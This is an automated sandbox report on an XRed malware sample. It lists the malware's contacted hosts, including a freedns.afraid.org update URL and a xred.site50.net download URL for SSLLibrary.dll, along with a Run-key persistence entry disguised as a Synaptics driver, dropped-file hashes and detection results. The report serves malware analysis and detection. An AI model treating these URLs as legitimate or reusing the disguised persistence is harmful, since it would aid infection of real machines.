                                                                                    http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978tSynaptics.exe, 00000003.00000003.2701819372.0000000000726000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://www.BetaPlace.comdxwsetup.exe, 00000004.00000000.2043809053.0000000000DAD000.00000002.00000001.01000000.00000007.sdmpfalse
                                                                                        		unknown
                                                                                        http://xred.site50.net/syn/SSLLibrary.dllfile.exefalse
                                                                                          		high

                                                                                          World Map of Contacted IPs

                                                                                          • No. of IPs < 25%
                                                                                          • 25% < No. of IPs < 50%
                                                                                          • 50% < No. of IPs < 75%
                                                                                          • 75% < No. of IPs

                                                                                          Public IPs

                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                          142.250.184.238
                                                                                          		docs.google.comUnited States
                                                                                          		15169GOOGLEUSfalse
                                                                                          142.250.185.97
                                                                                          		drive.usercontent.google.comUnited States
                                                                                          		15169GOOGLEUSfalse
                                                                                          69.42.215.252
                                                                                          		freedns.afraid.orgUnited States
                                                                                          		17048AWKNET-LLCUSfalse

                                                                                          General Information

                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                          Analysis ID:1583475
                                                                                          Start date and time:2025-01-02 20:36:54 +01:00
                                                                                          Joe Sandbox product:CloudBasic
                                                                                          Overall analysis duration:0h 7m 48s
                                                                                          Hypervisor based Inspection enabled:false
                                                                                          Report type:full
                                                                                          Cookbook file name:default.jbs
                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                          Run name:Run with higher sleep bypass
                                                                                          Number of analysed new started processes analysed:13
                                                                                          Number of new started drivers analysed:0
                                                                                          Number of existing processes analysed:0
                                                                                          Number of existing drivers analysed:0
                                                                                          Number of injected processes analysed:0
                                                                                          Technologies:
                                                                                          • HCA enabled
                                                                                          • EGA enabled
                                                                                          • AMSI enabled
                                                                                          Analysis Mode:default
                                                                                          Analysis stop reason:Timeout
                                                                                          Sample name:file.exe
                                                                                          Detection:MAL
                                                                                          Classification:mal74.rans.troj.expl.winEXE@11/258@4/3
                                                                                          EGA Information:
                                                                                          • Successful, ratio: 100%
                                                                                          HCA Information:
                                                                                          • Successful, ratio: 100%
                                                                                          • Number of executed functions: 26
                                                                                          • Number of non-executed functions: 40
                                                                                          Cookbook Comments:
                                                                                          • Found application associated with file extension: .exe
                                                                                          • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                                                          • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

                                                                                          Warnings

                                                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                          • Excluded IPs from analysis (whitelisted): 52.109.89.18, 184.28.90.27, 52.113.194.132, 23.212.89.111, 20.42.72.131, 20.190.160.14, 52.149.20.212, 13.107.246.45, 172.202.163.200
                                                                                          • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.afd.azureedge.net, weu-azsc-config.officeapps.live.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, ecs-office.s-0005.s-msedge.net, dlc-shim.trafficmanager.net, e12671.dscd.akamaiedge.net, ocsp.digicert.com, login.live.com, download.microsoft.com.edgekey.net, e16604.g.akamaiedge.net, main.dl.ms.akadns.net, officeclient.microsoft.com, download.microsoft.com, prod.fs.microsoft.com.akadns.net, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, otelrules.azureedge.net, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, ctldl.windowsupdate.com, s-0005-office.config.skype.com, fe3cr.delivery.mp.microsoft.com, s-0005.s-msedge.net, config.officeapps.live.com, onedscolprdeus00.eastus.cloudapp.azure.com, azureedge-t-prod.trafficmanager.net, ecs.office.trafficmanager.net, europe.configsvc1.live.com.akadns.net
                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                          • Report size getting too big, too many NtCreateKey calls found.
                                                                                          • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                          • Report size getting too big, too many NtEnumerateValueKey calls found.
                                                                                          • Report size getting too big, too many NtOpenFile calls found.
                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                          • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                                                          • Report size getting too big, too many NtReadFile calls found.
                                                                                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                          • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                          • VT rate limit hit for: file.exe

                                                                                          Simulations

                                                                                          Behavior and APIs

                                                                                          TimeTypeDescription
                                                                                          20:37:56AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device Driver C:\ProgramData\Synaptics\Synaptics.exe

                                                                                          Joe Sandbox View / Context

                                                                                          IPs

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          69.42.215.252file.exeGet hashmaliciousXRedBrowse
                                                                                          • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                          file.exeGet hashmaliciousXRedBrowse
                                                                                          • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                          file.exeGet hashmaliciousXRedBrowse
                                                                                          • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                          file.exeGet hashmaliciousXRedBrowse
                                                                                          • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                          file.exeGet hashmaliciousXRedBrowse
                                                                                          • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                          file.exeGet hashmaliciousXRedBrowse
                                                                                          • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                          file.exeGet hashmaliciousXRedBrowse
                                                                                          • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                          file.exeGet hashmaliciousAsyncRAT, XRed, XWormBrowse
                                                                                          • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                          Open Purchase Order Summary Details-16-12-2024.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                                          • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978

                                                                                          Domains

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          s-part-0017.t-0009.t-msedge.netfile.exeGet hashmaliciousXRedBrowse
                                                                                          • 13.107.246.45
                                                                                          file.exeGet hashmaliciousXRedBrowse
                                                                                          • 13.107.246.45
                                                                                          file.exeGet hashmaliciousXRedBrowse
                                                                                          • 13.107.246.45
                                                                                          file.exeGet hashmaliciousXRedBrowse
                                                                                          • 13.107.246.45
                                                                                          file.exeGet hashmaliciousXRedBrowse
                                                                                          • 13.107.246.45
                                                                                          file.exeGet hashmaliciousXRedBrowse
                                                                                          • 13.107.246.45
                                                                                          file.exeGet hashmaliciousXmrigBrowse
                                                                                          • 13.107.246.45
                                                                                          file.exeGet hashmaliciousAsyncRAT, XRed, XWormBrowse
                                                                                          • 13.107.246.45
                                                                                          https://gldkzr-lpqw.buzz/script/ut.js?cb%5C=1735764124690Get hashmaliciousUnknownBrowse
                                                                                          • 13.107.246.45
                                                                                          freedns.afraid.orgfile.exeGet hashmaliciousXRedBrowse
                                                                                          • 69.42.215.252
                                                                                          file.exeGet hashmaliciousXRedBrowse
                                                                                          • 69.42.215.252
                                                                                          file.exeGet hashmaliciousXRedBrowse
                                                                                          • 69.42.215.252
                                                                                          file.exeGet hashmaliciousXRedBrowse
                                                                                          • 69.42.215.252
                                                                                          file.exeGet hashmaliciousXRedBrowse
                                                                                          • 69.42.215.252
                                                                                          file.exeGet hashmaliciousXRedBrowse
                                                                                          • 69.42.215.252
                                                                                          file.exeGet hashmaliciousXRedBrowse
                                                                                          • 69.42.215.252
                                                                                          file.exeGet hashmaliciousAsyncRAT, XRed, XWormBrowse
                                                                                          • 69.42.215.252
                                                                                          Open Purchase Order Summary Details-16-12-2024.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                                          • 69.42.215.252

                                                                                          ASNs

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          AWKNET-LLCUSfile.exeGet hashmaliciousXRedBrowse
                                                                                          • 69.42.215.252
                                                                                          file.exeGet hashmaliciousXRedBrowse
                                                                                          • 69.42.215.252
                                                                                          file.exeGet hashmaliciousXRedBrowse
                                                                                          • 69.42.215.252
                                                                                          file.exeGet hashmaliciousXRedBrowse
                                                                                          • 69.42.215.252
                                                                                          file.exeGet hashmaliciousXRedBrowse
                                                                                          • 69.42.215.252
                                                                                          file.exeGet hashmaliciousXRedBrowse
                                                                                          • 69.42.215.252
                                                                                          file.exeGet hashmaliciousXRedBrowse
                                                                                          • 69.42.215.252
                                                                                          file.exeGet hashmaliciousAsyncRAT, XRed, XWormBrowse
                                                                                          • 69.42.215.252
                                                                                          Open Purchase Order Summary Details-16-12-2024.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                                          • 69.42.215.252

                                                                                          JA3 Fingerprints

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          37f463bf4616ecd445d4a1937da06e19file.exeGet hashmaliciousXRedBrowse
                                                                                          • 142.250.184.238
                                                                                          • 142.250.185.97
                                                                                          file.exeGet hashmaliciousXRedBrowse
                                                                                          • 142.250.184.238
                                                                                          • 142.250.185.97
                                                                                          file.exeGet hashmaliciousXRedBrowse
                                                                                          • 142.250.184.238
                                                                                          • 142.250.185.97
                                                                                          file.exeGet hashmaliciousXRedBrowse
                                                                                          • 142.250.184.238
                                                                                          • 142.250.185.97
                                                                                          file.exeGet hashmaliciousXRedBrowse
                                                                                          • 142.250.184.238
                                                                                          • 142.250.185.97
                                                                                          file.exeGet hashmaliciousXRedBrowse
                                                                                          • 142.250.184.238
                                                                                          • 142.250.185.97
                                                                                          file.exeGet hashmaliciousXRedBrowse
                                                                                          • 142.250.184.238
                                                                                          • 142.250.185.97
                                                                                          file.exeGet hashmaliciousAsyncRAT, XRed, XWormBrowse
                                                                                          • 142.250.184.238
                                                                                          • 142.250.185.97

                                                                                          Dropped Files

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          C:\ProgramData\Synaptics\RCXE9B.tmpfile.exeGet hashmaliciousXRedBrowse
                                                                                            file.exeGet hashmaliciousXRedBrowse

                                                                                              Created / dropped Files

                                                                                              C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\OFFICE\Heartbeat\HeartbeatCache.xml

                                                                                              Download File
                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):118
                                                                                              Entropy (8bit):3.5700810731231707
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
                                                                                              MD5:573220372DA4ED487441611079B623CD
                                                                                              SHA1:8F9D967AC6EF34640F1F0845214FBC6994C0CB80
                                                                                              SHA-256:BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
                                                                                              SHA-512:F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
                                                                                              Malicious:false
                                                                                              Reputation:high, very likely benign file
                                                                                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.H.e.a.r.t.b.e.a.t.C.a.c.h.e./.>.

                                                                                              C:\ProgramData\Synaptics\RCXE9B.tmp

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\file.exe
                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                              Category:modified
                                                                                              Size (bytes):771584
                                                                                              Entropy (8bit):6.6264053582391735
                                                                                              Encrypted:false
                                                                                              SSDEEP:12288:aMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9IIr:ansJ39LyjbJkQFMhmC+6GD9j
                                                                                              MD5:7407C51DD7AC30C4D79658D991A8B5D6
                                                                                              SHA1:B48603F6A1DFFAB2FF458780025F6A3C2E523C3C
                                                                                              SHA-256:1316730BBC50851C02F53254F9C57B99AF50A07BB0776332D1480BABD626F39A
                                                                                              SHA-512:38334452808E5D203B287E2F4A47B8F5BBCE1ED18FABCFA4A61B8C04429150DFBFFE2241323B3C87D90ABBABBED49A5CEA584CC1CE83BF519BB728E1D6AC18EB
                                                                                              Malicious:true
                                                                                              Yara Hits:
                                                                                              • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\RCXE9B.tmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\RCXE9B.tmp, Author: Joe Security
                                                                                              Antivirus:
                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                              • Antivirus: ReversingLabs, Detection: 94%
                                                                                              Joe Sandbox View:
                                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                                              Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................&....................@.......................... ...................@..............................B*...........................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                                                                              C:\ProgramData\Synaptics\Synaptics.exe

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\file.exe
                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):1059840
                                                                                              Entropy (8bit):7.037746245684915
                                                                                              Encrypted:false
                                                                                              SSDEEP:24576:6nsJ39LyjbJkQFMhmC+6GD9DukDF4zARUwSp:6nsHyjtk2MYC5GDFuRzmUd
                                                                                              MD5:EABA5B2C3B6607177112EC5F26438BA3
                                                                                              SHA1:D0572BAD54FACA6AF612763C6835FEB160A3DCD2
                                                                                              SHA-256:43555B4A8BD82ABD7E7B1F279B4F31AFB5A230CE4246BE6FDA4FDD5E7263C780
                                                                                              SHA-512:B767A6F167A0153628AE0BDB468EEF4D4311E48A58FF4774843EE36321C48823A24BE5C9D0D399800A19733A46EAD5109CD54E728E6A260107212647A5F60D9C
                                                                                              Malicious:true
                                                                                              Yara Hits:
                                                                                              • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                              • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                              Antivirus:
                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                              • Antivirus: ReversingLabs, Detection: 92%
                                                                                              Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..........................................@..............................................@..............................B*...........................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                                                                              C:\ProgramData\Synaptics\Synaptics.exe:Zone.Identifier

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\file.exe
                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):26
                                                                                              Entropy (8bit):3.95006375643621
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:ggPYV:rPYV
                                                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                              Malicious:true
                                                                                              Preview:[ZoneTransfer]....ZoneId=0

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\Apr2005_d3dx9_25_x86[1].cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1073002 bytes, 5 files, at 0x44 +A "d3dx9_25_x86.cat" +A "d3dx9_25.dll", flags 0x4, ID 6922, number 1, extra bytes 20 in head, 72 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1082170
                                                                                              Entropy (8bit):7.999075135168916
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:i0BodqhH/OCy8M+j5lcB4ZfeXBXUd/QLML9bw6Uzc12:iUbffy/+lmBXF8Ioxw6Uo12
                                                                                              MD5:9C5DCA423D9D68349D290DF291DDBEEF
                                                                                              SHA1:D9F1CAE586470EA309CE9F115525B0504FFFAEA4
                                                                                              SHA-256:5487ED4E969A822E5C481CEFB1D4DA3066B1D5EC8C55798B246915ECB58A8665
                                                                                              SHA-512:9F50599321F45FB7451B0A1C0F1DCBD6B4A4E60EE27B0EF5AA29168C1BCE5B08F34329916EA2EA655CD632D0A19C81953C2A5F1277F6A96FB63AFC098236509D
                                                                                              Malicious:true
                                                                                              Preview:MSCF....j_......D...........................j_...#..............H...7.........r2. .d3dx9_25_x86.cat..#.7.....r2}. .d3dx9_25.dll.......#...r2,. .apr2005_d3dx9_25_x86.inf.......#...r2,. .d3dx9_25_w9x.inf.....k.#...r2,. .d3dx9_25_x86.inf.(.0.?..CK..\....'4.A..".+.@.%..C*.4).b!@..$.....a..k.#..v.w.w.]xg...............9{......k....q....6.Z&Ey-.@.....a.0.T...9b......a...b....ilk.+c.5.af.o.vl..............<....s.z..V.7........fa\.G\$En..._..|$.?9.O...!..H.<...#.,...!.^N.<.g"..=.V|O.a..gwcw...t.c.......X..4(.).. .?.S..0k..._2{<%X.......m.*....D&&..v.c ....Av...u.l. K2......R.0.&.XO8b..p."H@^..2..jbb...hg.&...>.>....u..x....2...@.~....9..u.a.M.X...S5d_..|}z"h..1.....<...Z!...V).............}OO...n.2..Q....../.......R+[C..l..(...@......1........$..vs..K. m...e...b..\}u.+.....?..bg...P.......%.pRgTq.t.t.e<..t.Y._.X.?F.(../.......abb.G5.qkb.\..Z...g.....g..(.....f..Lz.8...h.e....t.R.fJ.iJNCv}:.V.:..m.B..JIQrlA..Z5..HR..)9-...:.......V.JP.)t*.....6m....

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\Apr2006_d3dx9_30_x64[1].cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1391870 bytes, 5 files, at 0x44 +A "d3dx9_30_x64.cat" +A "d3dx9_30.dll", flags 0x4, ID 6646, number 1, extra bytes 20 in head, 123 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1401038
                                                                                              Entropy (8bit):7.999678252363499
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:qpSOf0NLgpl5UCjJlezBreTxpgDysu8tyDJhllXCQaXVVeOYa54Sx0HfWyRA7ydL:80xgpl5UCLezBrg4uDDJhlAQQn8Sk87a
                                                                                              MD5:5EC6F520F3AFCC6494AB0D43B690EBD4
                                                                                              SHA1:2359E14CB6DA44AA89A3815E905D6FFD81960D02
                                                                                              SHA-256:27D99894E2A68601F46487C9999723DC83BCC9C6F903F2E2622D05668035B015
                                                                                              SHA-512:9DB4A9581EDAE2681491D5E13228642737D0D186E0E1672B063482B2E699274ACFCB81DFA9631902E93E009ADC0BBD9447061830C8CE2FEAD6743E2D45AAED60
                                                                                              Malicious:true
                                                                                              Preview:MSCF.....<......D............................<...#..............{..............44f .d3dx9_30_x64.cat...;........4!e .d3dx9_30.dll.......<....4.d .infinst.exe.&.....=....4.e .apr2006_d3dx9_30_x64.inf.......=....4.e .d3dx9_30_x64.inf..vs..9..[.... ..q..@..$Q.f...>....".}...W].}.uL.E.2H]..T.i%.h-...%ZX.<x{.ZX............GC......|/M...H....zh.n...S.0.I%&....E..Kq..g.....#..!+.....X.<.]..-N..1X.E.qg....6..O....{...Q.."..!"...M..R.ff.]...n...KG.x.T...{.@E1~.{@..+..f..}.EkQ.....B......Gg... ..E0.D.$. ...r.+.;Td4...2..........z..:J%..S.g.Z....._.).*.H...)!...T.....AA..b(.lH..-9&rp....9"r\..s..)........%..._2<..R.t..l>z.;...........3!..U..~..O....!.......\vo.%...q+.B.b2'.....z..W..A...5..B...6..B..B.....v.AZ....(....;.2..8.....M..is..mn.9..]..Ys.X"..&...R....S..........%.o.s./.P4......U..O.'.W...n-&H...(.9*:.x..zT9.(..D{L.....M.-.....N..U....n|.y......{r..Y.I......b.0..P....a..|..F:...)..U9=...g.........!y.........e.w...K.i.\.8Z....O..O.c.\.'...@./..!....aM.<.

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\Apr2006_xinput_x64[1].cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 81141 bytes, 5 files, at 0x44 +A "xinput1_1_x64.cat" +A "xinput1_1.dll", flags 0x4, ID 7457, number 1, extra bytes 20 in head, 5 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):90309
                                                                                              Entropy (8bit):7.986243949537019
                                                                                              Encrypted:false
                                                                                              SSDEEP:1536:/0CNqg1WzKHJUq/JSlvxToeSNOUp9BttldRL9zaMNez4fbI9YKztrIrm:/hIg1cEJUxvxlSNOUpfttldRL9zkzAI5
                                                                                              MD5:B0669F7D395078BEE0087B089F0B45C5
                                                                                              SHA1:30506FC3DCE9532EF0A8CB3973347EC9C3C9875F
                                                                                              SHA-256:E63A67783EF7624559F95AB697BF8AFBDAB7ACE31200283EF840E6B94AA16E5A
                                                                                              SHA-512:D7EFCFD85B3CB6CB9B1936B701A9D7D91A6094AA08D8C933EDF8493C6AD57BE05A579980A404B35E9721F71B45F4CAE28399FCA3FF5DF20A9A3138B90F86B94C
                                                                                              Malicious:false
                                                                                              Preview:MSCF.....<......D...............!............<...#.............................44f .xinput1_1_x64.cat..F.........4.d .xinput1_1.dll......e.....4.d .infinst.exe.V....l.....4.e .apr2006_xinput_x64.inf......o.....4.e .xinput1_1_x64.inf.. ...9..CK.{.XSI..MHh..AD.. .7t...4..H.TTB...$.."...,...v].{Y{...u..k.......w..pA..}......<.\.9s.w.9sf.x...}...y..L......j`.c2..6..>..L.i.......F.......QZ...X.p.}c.i.`.,^X/l.8...m._..Fv0.}pOO.................N..>....O 6......X..s....A.'.s0....X...c._0.|...?... .....IM.Ln..e..&..$...6?...K.....f7../.A..2...@=..7.`..L&..u:...w.>...q.q'=&...Sf....'..,.S`R,..aJ..@.nO.6.....TEF+.K...4.-.$....<e........ob.^..\({@).F.A.../.'..I../.F>@}..N.f....h...........q\.7#.~...Rm.2...HO0...{...dx....d..00<.3.v..........d....o:.e...,.....I..^v&.t .O..)Y;.B.7|Q.K....Oo...g.L..5.I.....;t.i.\Z.V..>../..G+.!....z5,.*....1.L..#....58..f....7.x..Va~....bY....\+..U.-M.D..H....d"n{..b.X..V...Lqz..k.h.5..I.d)E..x'.hc.dp.Dr.8E,.(.R..+..5.YZS.1.

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\Apr2007_d3dx10_33_x64[1].cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 692652 bytes, 7 files, at 0x44 +A "d3dx10_33_x64.cat" +A "d3dcompiler_33.dll", flags 0x4, ID 10164, number 1, extra bytes 20 in head, 61 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):701820
                                                                                              Entropy (8bit):7.999560976493214
                                                                                              Encrypted:true
                                                                                              SSDEEP:12288:RK6/uIaEOb2fc+HdQn/lDTK79RrFEYnj3LUFWQJcR1WrADy2IYxUSsEtiqUoY:RUlb2fc+9Qn/u9RrFEO3LUjU95I/EtiL
                                                                                              MD5:906318E8C444DAAAEA30550D5024F235
                                                                                              SHA1:3F3DCCF0A8A1CBF6F603BE1DA02E1E2BF89D24FC
                                                                                              SHA-256:1A37565C5B868B6A5C67F3E24B8AF547506799444CB77C7086E7B0CEC852F239
                                                                                              SHA-512:0A7AED2F49EA3DCBCA1607FC46F166A44BC9D08589DB05051B422C8AD84ADF322352F71333367C612F9579B4AACB4CD6B82489DDF168AD67FB4D42AB52999C88
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D................'...............#..........4...=....).........6.. .d3dx10_33_x64.cat.p]...)....l6O. .d3dcompiler_33.dll.h...2.....o6=. .d3dx10_33.dll.h....B.....6.. .infinst.exe.L....T.....6F. .apr2007_d3dx10_33_x64.inf.....NW.....6F. .d3dx10_33_x64.inf......Z.....6F. .d3dx10_33_x64_xp.inf.d7$....[.....@.....P...O...u..AA.?.nE.DW.$.3B..BU.H...!.W..".J.^.IJ$(....hD.......vo?.$ef . t.=.......p.H.P.D&..t@..\..sCb!1i..O...........w................l{......d...-....Q.\.......xCNH....+.%"..;..o..DD..r.4B."...H`.?.P&.....>"(...E..HT.Q....:..e9 .{.j%...e.....$.p..R.....;.%!..>.....G......*.....x.~.@.....H.K....P?.w.^....7.R.RW ../p..w, Y..bu W.r.h.T..$Q.....\z....V_.^..N0=....K~.>.$v.}...y7"!.w...s..@b....~\.ily........Y....l.`.^.?y...w.. ....]..)...R1....... ...#......G...J.F.0x1.6^S>.*/.x..p..............(.B..$.....r.....CO9.R.1..a.a..})..^.h...+.P..}-?Z..H..t....U..gO..M.].l.2..........*.d.N6G...I..=..L=O...........:.....*...... .......2.c.?'.<1..w......?..E

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\Apr2007_d3dx9_33_x86[1].cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1600079 bytes, 5 files, at 0x44 +A "d3dx9_33_x86.cat" +A "d3dx9_33.dll", flags 0x4, ID 7180, number 1, extra bytes 20 in head, 108 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1609247
                                                                                              Entropy (8bit):7.999284261824255
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:4cQY0tIpwa5ydxGuruluTsRWo1Iq9e5m98yiN9/0rjVH60mPxr/1MQK:4cIIi+G9rul8uooec98yi//0rjoDZrCF
                                                                                              MD5:A5915EC0BE93D7EEBE8800CE761EE6DC
                                                                                              SHA1:E8BBC21C2B5F0E5801286F07E3DA09DBC67C3961
                                                                                              SHA-256:EFA2E6DE548401376A575E83A79DE019AA38F191D63FDEF3BD2B07D8CB33E3D7
                                                                                              SHA-512:02259FF3C8478CBA134A8F8408AA624B7165CED97C0AED8C9626034599DD5439F84D1AF9EEFC4191898B0A524E5FFAFB9875EC00E740CEBE97EAC4C2DD0E31AA
                                                                                              Malicious:true
